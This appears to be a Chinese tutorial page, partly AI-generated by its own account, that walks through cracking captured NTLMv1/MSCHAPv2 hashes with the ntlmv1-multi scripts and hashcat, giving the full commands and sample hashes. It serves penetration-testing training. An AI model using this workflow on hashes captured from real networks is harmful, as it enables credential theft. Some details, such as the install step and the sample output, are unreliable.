ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

ntlmv1-multi实战案例:破解MSCHAPv2哈希的完整步骤

ntlmv1-multi实战案例:破解MSCHAPv2哈希的完整步骤

ntlmv1-multi实战案例:破解MSCHAPv2哈希的完整步骤

【免费下载链接】ntlmv1-multiNTLMv1 Multitool项目地址: https://gitcode.com/gh_mirrors/nt/ntlmv1-multi

ntlmv1-multi是一款功能强大的NTLMv1 Multitool,专为破解MSCHAPv2哈希设计,能够帮助安全从业者快速恢复密码哈希,提升渗透测试效率。本文将通过实际案例,详细介绍使用ntlmv1-multi破解MSCHAPv2哈希的完整流程,从环境配置到最终获取结果,让新手也能轻松掌握这一实用工具。

准备工作:工具安装与环境配置 🛠️

1. 克隆项目仓库

首先需要将ntlmv1-multi项目克隆到本地,执行以下命令:

git clone https://gitcode.com/gh_mirrors/nt/ntlmv1-multi cd ntlmv1-multi

2. 安装依赖

项目基于Python开发,需要安装相关依赖包。通过项目根目录下的pyproject.tomluv.lock文件,可以快速安装所需依赖:

pip install -r requirements.txt

3. 配置NTLMv1相关设置

在Windows系统中,NTLMv1的认证设置对哈希破解至关重要。通过修改注册表中的LmCompatibilityLevel值,可以控制客户端和服务器的NTLM认证行为。

注册表位置HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

实战步骤:破解MSCHAPv2哈希的详细流程 🔍

步骤1:获取NTLMv1哈希

通过Responder等工具捕获NTLMv1哈希,格式如下:

SERVER1$::MOG:7EF3F506F5EA510E00000000000000000000000000000000:1217169BD7BE0270A033899BD440016D3E6DACAF5894D504:ff81dfd6b12c269d

步骤2:使用ntlmv1.py解析哈希

运行项目根目录下的ntlmv1.py脚本,解析哈希并提取关键信息(CT1、CT2、CT3、Challenge等):

python ntlmv1.py --ntlmv1 "SERVER1$::MOG:7EF3F506F5EA510E00000000000000000000000000000000:1217169BD7BE0270A033899BD440016D3E6DACAF5894D504:ff81dfd6b12c269d"

解析后将输出:

  • Hostname:目标主机名
  • Username:用户名
  • Challenge:挑战值
  • LM Response和NT Response:响应哈希
  • CT1、CT2、CT3:哈希分段

步骤3:使用ct3.py恢复PT3

CT3是NT响应中的关键分段,通过ct3.py工具可恢复PT3(NTLM哈希的最后4个字符):

python ct3.py 1217169BD7BE0270 ff81dfd6b12c269d

输出结果示例:

Recovered key: a1b2

步骤4:使用Hashcat破解CT1和CT2

将CT1和CT2与Challenge组合,生成Hashcat可识别的格式:

echo "7EF3F506F5EA510E:ff81dfd6b12c269d" >> 14000.hash echo "0000000000000000:ff81dfd6b12c269d" >> 14000.hash

使用Hashcat破解(需指定模式14000和DES字符集):

hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

步骤5:合并结果获取完整NTLM哈希

将Hashcat破解得到的DES密钥通过deskey_to_ntlm.pl转换为NTLM哈希,再与PT3组合,得到完整的NTLM哈希:

perl deskey_to_ntlm.pl <hashcat_output>

常见问题与解决方案 ❓

问题1:哈希解析失败

原因:哈希格式不正确或包含ESS(扩展会话安全)字段。
解决:使用--disable-ess参数重新捕获哈希,或通过ntlmv1.py的ESS处理逻辑自动适配。

问题2:CT3恢复超时

原因:DES密钥空间较大,暴力破解耗时。
解决:优化ct3.py中的循环逻辑(如第37行的16位密钥空间遍历),或使用GPU加速工具。

问题3:Hashcat破解无结果

原因:字符集不完整或模式错误。
解决:确保使用DES_full.charset字符集,并验证哈希模式为14000(NTLMv1)。

总结

通过ntlmv1-multi工具,我们可以高效地完成MSCHAPv2哈希的破解流程。从哈希解析到密钥恢复,再到最终合并结果,每个步骤都有明确的工具支持。项目中的ntlmv1.pyct3.py是核心脚本,结合Hashcat等工具,能够快速实现密码哈希的恢复。掌握这一流程,将极大提升安全测试中凭证获取的效率,为后续渗透测试奠定基础。

提示:实际使用中需遵守法律法规,仅在授权环境下进行测试。项目相关工具和文档可在本地仓库中查阅,如ntlmv1.pyct3.py等核心文件。

【免费下载链接】ntlmv1-multiNTLMv1 Multitool项目地址: https://gitcode.com/gh_mirrors/nt/ntlmv1-multi

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

返回列表